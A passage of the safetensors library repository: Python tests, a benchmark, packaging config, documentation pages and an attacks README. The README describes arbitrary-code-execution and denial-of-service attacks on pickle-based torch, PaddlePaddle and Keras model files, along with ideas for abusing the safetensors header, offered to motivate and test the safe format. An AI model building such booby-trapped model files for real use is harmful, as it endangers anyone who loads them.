56 | print(s3.ls("my-bucket"))
57 | with s3.open("out/fs.safetensors", "wb") as f:
58 | f.write(byts)
59 | # Now loading
60 | loaded = {}
61 | with s3.open("out/fs.safetensors", "rb") as f:
62 | with _safe_open_handle(f, framework="np", device="cpu") as g:
63 | for key in g.keys():
64 | loaded[key] = g.get_tensor(key)
65 | self.assertTensorEqual(tensors, loaded, np.allclose)
66 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_mlx_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 |
4 |
5 | HAS_MLX = False
6 | if platform.system() == "Darwin":
7 | # This platform is not supported, we don't want to crash on import
8 | # This test will be skipped anyway.
9 | try:
10 | import mlx.core as mx
11 |
12 | HAS_MLX = True
13 | except ImportError:
14 | pass
15 | if HAS_MLX:
16 | from safetensors import safe_open
17 | from safetensors.mlx import load_file, save_file
18 |
19 |
20 | # MLX only exists on Mac
21 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac")
22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.")
23 | class LoadTestCase(unittest.TestCase):
24 | def setUp(self):
25 | data = {
26 | "test": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
27 | "test2": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
28 | "test3": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
29 | "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32).astype(
30 | mx.complex64
31 | ),
32 | # This doesn't work because bfloat16 is not implemented
33 | # with similar workarounds as jax/tensorflow.
34 | # https://github.com/ml-explore/mlx/issues/1296
35 | # "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.bfloat16),
36 | }
37 | self.mlx_filename = "./tests/data/mlx_load.npz"
38 | self.sf_filename = "./tests/data/mlx_load.safetensors"
39 |
40 | mx.savez(self.mlx_filename, **data)
41 | save_file(data, self.sf_filename)
42 |
43 | def test_zero_sized(self):
44 | data = {
45 | "test": mx.zeros((2, 0), dtype=mx.float32),
46 | }
47 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
48 | save_file(data.copy(), local)
49 | reloaded = load_file(local)
50 | # Empty tensor != empty tensor on numpy, so comparing shapes
51 | # instead
52 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
53 |
54 | def test_deserialization_safe(self):
55 | weights = load_file(self.sf_filename)
56 |
57 | mlx_weights = mx.load(self.mlx_filename)
58 |
59 | for k, v in weights.items():
60 | tv = mlx_weights[k]
61 | self.assertTrue(mx.allclose(v, tv))
62 |
63 | def test_deserialization_safe_open(self):
64 | weights = {}
65 | with safe_open(self.sf_filename, framework="mlx") as f:
66 | for k in f.keys():
67 | weights[k] = f.get_tensor(k)
68 |
69 | mlx_weights = mx.load(self.mlx_filename)
70 |
71 | for k, v in weights.items():
72 | tv = mlx_weights[k]
73 | self.assertTrue(mx.allclose(v, tv))
74 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_tf.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import h5py
5 | import numpy as np
6 | import tensorflow as tf
7 |
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(filename, tensors=None, prefix=""):
12 | with h5py.File(filename, "r") as f:
13 | if tensors is None:
14 | tensors = {}
15 | for k in f.keys():
16 | if isinstance(f[k], h5py._hl.dataset.Dataset):
17 | key = k if not prefix else f"{prefix}_{k}"
18 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
19 | else:
20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
21 | return tensors
22 |
23 |
24 | def _save(filename, tensors, prefix=""):
25 | with h5py.File(filename, "w") as f:
26 | for name, tensor in tensors.items():
27 | tensor = tensor.numpy()
28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
29 | dset[:] = tensor
30 |
31 |
32 | def create_gpt2(n_layers: int):
33 | tensors = {}
34 | tensors["wte"] = tf.zeros((50257, 768))
35 | tensors["wpe"] = tf.zeros((1024, 768))
36 | for i in range(n_layers):
37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,))
38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,))
39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024))
40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304))
41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304))
42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768))
43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768))
44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768))
45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768))
46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072))
47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072))
48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768))
49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768))
50 | tensors["ln_f.weight"] = tf.zeros((768))
51 | tensors["ln_f.bias"] = tf.zeros((768))
52 | return tensors
53 |
54 |
55 | def test_tf_tf_load(benchmark):
56 | # benchmark something
57 | weights = create_gpt2(12)
58 | with tempfile.NamedTemporaryFile(delete=False) as f:
59 | _save(f.name, weights)
60 | result = benchmark(_load, f.name)
61 | os.unlink(f.name)
62 |
63 | for k, v in weights.items():
64 | tv = result[k]
65 | assert np.allclose(v, tv)
66 |
67 |
68 | def test_tf_sf_load(benchmark):
69 | # benchmark something
70 | weights = create_gpt2(12)
71 | with tempfile.NamedTemporaryFile(delete=False) as f:
72 | save_file(weights, f.name)
73 | result = benchmark(load_file, f.name)
74 | os.unlink(f.name)
75 |
76 | for k, v in weights.items():
77 | tv = result[k]
78 | assert np.allclose(v, tv)
79 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_flax_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 | import sys
4 |
5 |
6 | if platform.system() != "Windows":
7 | # This platform is not supported, we don't want to crash on import
8 | # This test will be skipped anyway.
9 | import jax.numpy as jnp
10 | from jax import random
11 | from flax.serialization import msgpack_restore, msgpack_serialize
12 | from safetensors import safe_open
13 | from safetensors.flax import load_file, save_file
14 |
15 |
16 | # Jax doesn't not exist on Windows
17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows")
18 | class LoadTestCase(unittest.TestCase):
19 | def setUp(self):
20 | key = random.key(0)
21 | data = {
22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32),
23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16),
24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16),
25 | "test4": random.normal(key, (1024, 1024), dtype=jnp.complex64),
26 | }
27 | self.flax_filename = "./tests/data/flax_load.msgpack"
28 | self.sf_filename = "./tests/data/flax_load.safetensors"
29 |
30 | serialized = msgpack_serialize(data)
31 | with open(self.flax_filename, "wb") as f:
32 | f.write(serialized)
33 |
34 | save_file(data, self.sf_filename)
35 |
36 | def test_zero_sized(self):
37 | data = {
38 | "test": jnp.zeros((2, 0), dtype=jnp.float32),
39 | }
40 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
41 | save_file(data.copy(), local)
42 | reloaded = load_file(local)
43 | # Empty tensor != empty tensor on numpy, so comparing shapes
44 | # instead
45 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
46 |
47 | def test_deserialization_safe(self):
48 | weights = load_file(self.sf_filename)
49 |
50 | with open(self.flax_filename, "rb") as f:
51 | data = f.read()
52 | flax_weights = msgpack_restore(data)
53 |
54 | for k, v in weights.items():
55 | tv = flax_weights[k]
56 | self.assertTrue(jnp.allclose(v, tv))
57 |
58 | def test_deserialization_safe_open(self):
59 | weights = {}
60 | with safe_open(self.sf_filename, framework="flax") as f:
61 | for k in f.keys():
62 | weights[k] = f.get_tensor(k)
63 |
64 | with open(self.flax_filename, "rb") as f:
65 | data = f.read()
66 | flax_weights = msgpack_restore(data)
67 |
68 | for k, v in weights.items():
69 | tv = flax_weights[k]
70 | self.assertTrue(jnp.allclose(v, tv))
71 |
72 | def test_loading_without_ml_dtype(self):
73 | # This does not work as we cannot unload
74 | # modules, copy this into its own file to test.
75 | # https://github.com/huggingface/safetensors/issues/598
76 | sys.modules.pop("ml_dtypes", None)
77 | with safe_open(self.sf_filename, framework="flax") as f:
78 | f.get_tensor("test3")
79 |
--------------------------------------------------------------------------------
/bindings/python/pyproject.toml:
--------------------------------------------------------------------------------
1 | [project]
2 | name = 'safetensors'
3 | requires-python = '>=3.9'
4 | authors = [
5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'}
6 | ]
7 | classifiers = [
8 | "Development Status :: 5 - Production/Stable",
9 | "Intended Audience :: Developers",
10 | "Intended Audience :: Education",
11 | "Intended Audience :: Science/Research",
12 | "License :: OSI Approved :: Apache Software License",
13 | "Operating System :: OS Independent",
14 | "Programming Language :: Python :: 3",
15 | "Programming Language :: Python :: 3.7",
16 | "Programming Language :: Python :: 3.8",
17 | "Programming Language :: Python :: 3.9",
18 | "Programming Language :: Python :: 3.10",
19 | "Topic :: Scientific/Engineering :: Artificial Intelligence",
20 | "Typing :: Typed",
21 | ]
22 | license = { file = "LICENSE" }
23 | dynamic = [
24 | 'description',
25 | 'readme',
26 | 'version',
27 | ]
28 |
29 | [project.urls]
30 | Homepage = 'https://github.com/huggingface/safetensors'
31 | Source = 'https://github.com/huggingface/safetensors'
32 |
33 | [project.optional-dependencies]
34 | numpy = ["numpy>=1.21.6"]
35 | torch = [
36 | "packaging",
37 | "safetensors[numpy]",
38 | "torch>=1.10",
39 | ]
40 | tensorflow = [
41 | "safetensors[numpy]",
42 | "tensorflow>=2.11.0",
43 | ]
44 | # pinning tf version 2.11.0 for doc-builder
45 | pinned-tf = [
46 | "safetensors[numpy]",
47 | "tensorflow==2.18.0",
48 | ]
49 | jax = [
50 | "safetensors[numpy]",
51 | "flax>=0.6.3",
52 | "jax>=0.3.25",
53 | "jaxlib>=0.3.25",
54 | ]
55 | mlx = [
56 | "mlx>=0.0.9",
57 | ]
58 | paddlepaddle = [
59 | "safetensors[numpy]",
60 | "paddlepaddle>=2.4.1",
61 | ]
62 | quality = [
63 | "ruff", # after updating to black 2023, also update Python version in pyproject.toml to 3.7
64 | ]
65 | testing = [
66 | "safetensors[numpy]",
67 | "h5py>=3.7.0",
68 | "huggingface_hub>=0.12.1",
69 | "setuptools_rust>=1.5.2",
70 | "pytest>=7.2.0",
71 | "pytest-benchmark>=4.0.0",
72 | # "python-afl>=0.7.3",
73 | "hypothesis>=6.70.2",
74 | ]
75 | testingfree = [
76 | "safetensors[numpy]",
77 | "huggingface_hub>=0.12.1",
78 | "setuptools_rust>=1.5.2",
79 | "pytest>=7.2.0",
80 | "pytest-benchmark>=4.0.0",
81 | # "python-afl>=0.7.3",
82 | "hypothesis>=6.70.2",
83 | ]
84 | all = [
85 | "safetensors[torch]",
86 | "safetensors[numpy]",
87 | "safetensors[pinned-tf]",
88 | "safetensors[jax]",
89 | "safetensors[paddlepaddle]",
90 | "safetensors[quality]",
91 | "safetensors[testing]",
92 | ]
93 | dev = [
94 | "safetensors[all]",
95 | ]
96 |
97 |
98 | [build-system]
99 | requires = ["maturin>=1.0,<2.0"]
100 | build-backend = "maturin"
101 |
102 | [tool.maturin]
103 | python-source = "py_src"
104 | module-name = "safetensors._safetensors_rust"
105 | bindings = 'pyo3'
106 | features = ["pyo3/extension-module"]
107 |
108 | [tool.black]
109 | line-length = 119
110 | target-version = ['py35']
111 |
112 | [tool.setuptools.dynamic]
113 | readme = {file = ["README.rst"]}
114 |
--------------------------------------------------------------------------------
/attacks/README.md:
--------------------------------------------------------------------------------
1 | The purpose of this directory is to showcase various attacks (and creating your own).
2 |
3 |
4 | # Torch Arbitrary code execution
5 |
6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
7 | ```
8 | python torch_ace_create.py
9 | python torch_ace_get_pwned.py
10 | ```
11 |
12 | # PaddlePaddle Arbitrary code execution
13 |
14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file.
15 | ```
16 | python paddle_ace_create.py
17 | python paddle_ace_get_pwned.py
18 | ```
19 |
20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`)
21 |
22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
23 | ```
24 | python tf_dos_create.py
25 | python tf_dos_get_pwned.py
26 | ```
27 |
28 | # Torch Denial of Service (OOM kills the running process)
29 |
30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
31 | ```
32 | python torch_dos_create.py
33 | python torch_dos_get_pwned.py
34 | ```
35 |
36 | # Numpy Denial of Service (OOM kills the running process)
37 |
38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
39 | ```
40 | python numpy_dos_create.py
41 | python numpy_dos_get_pwned.py
42 | ```
43 |
44 | # Safetensors abuse attempts
45 |
46 | In order to try and check the limits, we also try to abuse the current format.
47 | Please send ideas!
48 |
49 | A few things can be abused:
50 | - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1).
51 | - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least
52 | it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse).
53 | Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2)
54 | - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default.
55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
56 | While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small
57 | file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact
58 | that the offsets must be contiguous and non overlapping.
59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against.
60 | - Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned).
61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary.
62 |
63 | ```
64 | python safetensors_abuse_attempt_1.py
65 | python safetensors_abuse_attempt_2.py
66 | python safetensors_abuse_attempt_3.py
67 | ```
68 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_tf_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import h5py
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import safe_open
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(f, tensors=None, prefix=""):
12 | if tensors is None:
13 | tensors = {}
14 | for k in f.keys():
15 | if isinstance(f[k], h5py._hl.dataset.Dataset):
16 | key = k if not prefix else f"{prefix}_{k}"
17 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
18 | else:
19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
20 | return tensors
21 |
22 |
23 | def _save(f, tensors, prefix=""):
24 | for name, tensor in tensors.items():
25 | tensor = tensor.numpy()
26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
27 | dset[:] = tensor
28 |
29 |
30 | class SafeTestCase(unittest.TestCase):
31 | def setUp(self):
32 | data = {
33 | "test": tf.zeros((1024, 1024), dtype=tf.float32),
34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32),
35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32),
36 | "test4": tf.zeros((1024, 1024), dtype=tf.complex64),
37 | }
38 | self.tf_filename = "./tests/data/tf_load.h5"
39 | self.sf_filename = "./tests/data/tf_load.safetensors"
40 |
41 | with h5py.File(self.tf_filename, "w") as f:
42 | _save(f, data)
43 | save_file(data, self.sf_filename)
44 |
45 | def test_zero_sized(self):
46 | data = {
47 | "test": tf.zeros((2, 0), dtype=tf.float32),
48 | }
49 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
50 | save_file(data.copy(), local)
51 | reloaded = load_file(local)
52 | # Empty tensor != empty tensor on numpy, so comparing shapes
53 | # instead
54 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
55 |
56 | def test_deserialization_safe(self):
57 | weights = load_file(self.sf_filename)
58 |
59 | with h5py.File(self.tf_filename, "r") as f:
60 | tf_weights = _load(f)
61 |
62 | for k, v in weights.items():
63 | tv = tf_weights[k]
64 | self.assertTrue(np.allclose(v, tv))
65 |
66 | def test_bfloat16(self):
67 | data = {
68 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16),
69 | }
70 | save_file(data, self.sf_filename)
71 | weights = {}
72 | with safe_open(self.sf_filename, framework="tf") as f:
73 | for k in f.keys():
74 | weights[k] = f.get_tensor(k)
75 |
76 | for k, v in weights.items():
77 | tv = data[k]
78 | self.assertTrue(tf.experimental.numpy.allclose(v, tv))
79 |
80 | def test_deserialization_safe_open(self):
81 | weights = {}
82 | with safe_open(self.sf_filename, framework="tf") as f:
83 | for k in f.keys():
84 | weights[k] = f.get_tensor(k)
85 |
86 | with h5py.File(self.tf_filename, "r") as f:
87 | tf_weights = _load(f)
88 |
89 | for k, v in weights.items():
90 | tv = tf_weights[k]
91 | self.assertTrue(np.allclose(v, tv))
92 |
--------------------------------------------------------------------------------
/docs/source/speed.mdx:
--------------------------------------------------------------------------------
1 | # Speed Comparison
2 |
3 |
4 |
9 |
10 |
11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab.
12 |
13 | Before you begin, make sure you have all the necessary libraries installed:
14 |
15 | ```bash
16 | pip install safetensors huggingface_hub torch
17 | ```
18 |
19 | Let's start by importing all the packages that will be used:
20 |
21 | ```py
22 | >>> import os
23 | >>> import datetime
24 | >>> from huggingface_hub import hf_hub_download
25 | >>> from safetensors.torch import load_file
26 | >>> import torch
27 | ```
28 |
29 | Download safetensors & torch weights for gpt2:
30 |
31 | ```py
32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors")
33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin")
34 | ```
35 |
36 | ### CPU benchmark
37 |
38 | ```py
39 | >>> start_st = datetime.datetime.now()
40 | >>> weights = load_file(sf_filename, device="cpu")
41 | >>> load_time_st = datetime.datetime.now() - start_st
42 | >>> print(f"Loaded safetensors {load_time_st}")
43 |
44 | >>> start_pt = datetime.datetime.now()
45 | >>> weights = torch.load(pt_filename, map_location="cpu")
46 | >>> load_time_pt = datetime.datetime.now() - start_pt
47 | >>> print(f"Loaded pytorch {load_time_pt}")
48 |
49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
50 | Loaded safetensors 0:00:00.004015
51 | Loaded pytorch 0:00:00.307460
52 | on CPU, safetensors is faster than pytorch by: 76.6 X
53 | ```
54 |
55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282).
56 | The currently shown speedup was gotten on:
57 | * OS: Ubuntu 18.04.6 LTS
58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz
59 |
60 |
61 | ### GPU benchmark
62 |
63 | ```py
64 | >>> # This is required because this feature hasn't been fully verified yet, but
65 | >>> # it's been tested on many different environments
66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1"
67 |
68 | >>> # CUDA startup out of the measurement
69 | >>> torch.zeros((2, 2)).cuda()
70 |
71 | >>> start_st = datetime.datetime.now()
72 | >>> weights = load_file(sf_filename, device="cuda:0")
73 | >>> load_time_st = datetime.datetime.now() - start_st
74 | >>> print(f"Loaded safetensors {load_time_st}")
75 |
76 | >>> start_pt = datetime.datetime.now()
77 | >>> weights = torch.load(pt_filename, map_location="cuda:0")
78 | >>> load_time_pt = datetime.datetime.now() - start_pt
79 | >>> print(f"Loaded pytorch {load_time_pt}")
80 |
81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
82 | Loaded safetensors 0:00:00.165206
83 | Loaded pytorch 0:00:00.353889
84 | on GPU, safetensors is faster than pytorch by: 2.1 X
85 | ```
86 |
87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU.
88 | The currently shown speedup was gotten on:
89 | * OS: Ubuntu 18.04.6 LTS.
90 | * GPU: Tesla T4
91 | * Driver Version: 460.32.03
92 | * CUDA Version: 11.2
93 |
--------------------------------------------------------------------------------
/docs/source/index.mdx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | # Safetensors
9 |
10 | Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed).
11 |
12 | ## Installation
13 |
14 | with pip:
15 | ```
16 | pip install safetensors
17 | ```
18 |
19 | with conda:
20 | ```
21 | conda install -c huggingface safetensors
22 | ```
23 |
24 | ## Usage
25 |
26 | ### Load tensors
27 |
28 | ```python
29 | from safetensors import safe_open
30 |
31 | tensors = {}
32 | with safe_open("model.safetensors", framework="pt", device=0) as f:
33 | for k in f.keys():
34 | tensors[k] = f.get_tensor(k)
35 | ```
36 |
37 | Loading only part of the tensors (interesting when running on multiple GPU)
38 |
39 | ```python
40 | from safetensors import safe_open
41 |
42 | tensors = {}
43 | with safe_open("model.safetensors", framework="pt", device=0) as f:
44 | tensor_slice = f.get_slice("embedding")
45 | vocab_size, hidden_dim = tensor_slice.get_shape()
46 | tensor = tensor_slice[:, :hidden_dim]
47 | ```
48 |
49 | ### Save tensors
50 |
51 | ```python
52 | import torch
53 | from safetensors.torch import save_file
54 |
55 | tensors = {
56 | "embedding": torch.zeros((2, 2)),
57 | "attention": torch.zeros((2, 3))
58 | }
59 | save_file(tensors, "model.safetensors")
60 | ```
61 |
62 | ## Format
63 |
64 | Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format:
65 |
66 |
67 |
68 |
69 |
70 | ## Featured Projects
71 |
72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors:
73 |
74 | * [huggingface/transformers](https://github.com/huggingface/transformers)
75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx)
76 | * [huggingface/candle](https://github.com/huggingface/candle)
77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui)
78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537)
79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix)
80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI)
81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models)
82 | * [CivitAI](https://civitai.com/)
83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers)
84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx)
85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI)
86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui)
87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner)
88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP)
89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT)
90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry)
91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI)
92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE)
93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax)
94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic)
95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures)
96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors)
97 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_threadable.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | from concurrent import futures
3 | import threading
4 | import numpy as np
5 | from safetensors import serialize_file
6 | from safetensors.numpy import load_file
7 | import time
8 | import os
9 |
10 |
11 | class TestCase(unittest.TestCase):
12 | def test_serialize_file_releases_gil(self):
13 | """Test that serialize_file releases the GIL and can run concurrently."""
14 | # Create large numpy arrays to ensure serialization takes measurable time
15 | # Keep them alive throughout the test since we pass raw pointers
16 | tensor_a = np.random.randn(2000, 20000).astype(np.float32)
17 | tensor_b = np.random.randint(0, 128, (20000, 2000), dtype=np.int8)
18 |
19 | # Build the tensor dict with data pointers (as serialize_file expects)
20 | tensor_data = {
21 | "tensor_a": {
22 | "dtype": tensor_a.dtype.name,
23 | "shape": tensor_a.shape,
24 | "data_ptr": tensor_a.ctypes.data,
25 | "data_len": tensor_a.nbytes,
26 | },
27 | "tensor_b": {
28 | "dtype": tensor_b.dtype.name,
29 | "shape": tensor_b.shape,
30 | "data_ptr": tensor_b.ctypes.data,
31 | "data_len": tensor_b.nbytes,
32 | },
33 | }
34 |
35 | num_threads = 4
36 | results = {}
37 | barrier = threading.Barrier(num_threads)
38 | file_names = [f"tmp_thread_{i}.safetensors" for i in range(num_threads)]
39 |
40 | def saving_thread(thread_id):
41 | file_name = file_names[thread_id]
42 | # Wait for all threads to be ready
43 | barrier.wait()
44 | start_time = time.monotonic()
45 | serialize_file(tensor_data, file_name)
46 | end_time = time.monotonic()
47 | results[thread_id] = (start_time, end_time)
48 |
49 | try:
50 | # Run multiple serialize_file calls concurrently
51 | with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
52 | futs = [executor.submit(saving_thread, i) for i in range(num_threads)]
53 | for f in futs:
54 | f.result() # Raise any exceptions
55 |
56 | # Verify all threads completed
57 | self.assertEqual(len(results), num_threads)
58 |
59 | # Check that the threads actually ran concurrently by verifying
60 | # their execution windows overlap. If the GIL was held, threads
61 | # would run sequentially with no overlap.
62 | all_starts = [r[0] for r in results.values()]
63 | all_ends = [r[1] for r in results.values()]
64 |
65 | # The latest start should be before the earliest end if threads overlapped
66 | latest_start = max(all_starts)
67 | earliest_end = min(all_ends)
68 |
69 | # If GIL is released, threads run in parallel so latest_start < earliest_end
70 | # If GIL is NOT released, threads run sequentially so latest_start >= earliest_end
71 | self.assertLess(
72 | latest_start,
73 | earliest_end,
74 | f"Threads did not run concurrently - GIL may not be released. "
75 | f"Latest start: {latest_start}, Earliest end: {earliest_end}",
76 | )
77 |
78 | # Verify all output files are valid and contain correct data
79 | for file_name in file_names:
80 | loaded = load_file(file_name)
81 | np.testing.assert_array_equal(
82 | loaded["tensor_a"],
83 | tensor_a,
84 | err_msg=f"tensor_a mismatch in {file_name}",
85 | )
86 | np.testing.assert_array_equal(
87 | loaded["tensor_b"],
88 | tensor_b,
89 | err_msg=f"tensor_b mismatch in {file_name}",
90 | )
91 | finally:
92 | # Clean up all temporary files
93 | for file_name in file_names:
94 | if os.path.exists(file_name):
95 | os.remove(file_name)
96 |
97 |
98 | if __name__ == "__main__":
99 | unittest.main()
100 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import jax.numpy as jnp
7 | from jax import Array
8 | from safetensors import numpy, safe_open
9 |
10 |
11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes:
12 | """
13 | Saves a dictionary of tensors into raw bytes in safetensors format.
14 |
15 | Args:
16 | tensors (`Dict[str, Array]`):
17 | The incoming tensors. Tensors need to be contiguous and dense.
18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
19 | Optional text only metadata you might want to save in your header.
20 | For instance it can be useful to specify more about the underlying
21 | tensors. This is purely informative and does not affect tensor loading.
22 |
23 | Returns:
24 | `bytes`: The raw bytes representing the format
25 |
26 | Example:
27 |
28 | ```python
29 | from safetensors.flax import save
30 | from jax import numpy as jnp
31 |
32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
33 | byte_data = save(tensors)
34 | ```
35 | """
36 | np_tensors = _jnp2np(tensors)
37 | return numpy.save(np_tensors, metadata=metadata)
38 |
39 |
40 | def save_file(
41 | tensors: Dict[str, Array],
42 | filename: Union[str, os.PathLike],
43 | metadata: Optional[Dict[str, str]] = None,
44 | ) -> None:
45 | """
46 | Saves a dictionary of tensors into raw bytes in safetensors format.
47 |
48 | Args:
49 | tensors (`Dict[str, Array]`):
50 | The incoming tensors. Tensors need to be contiguous and dense.
51 | filename (`str`, or `os.PathLike`)):
52 | The filename we're saving into.
53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
54 | Optional text only metadata you might want to save in your header.
55 | For instance it can be useful to specify more about the underlying
56 | tensors. This is purely informative and does not affect tensor loading.
57 |
58 | Returns:
59 | `None`
60 |
61 | Example:
62 |
63 | ```python
64 | from safetensors.flax import save_file
65 | from jax import numpy as jnp
66 |
67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
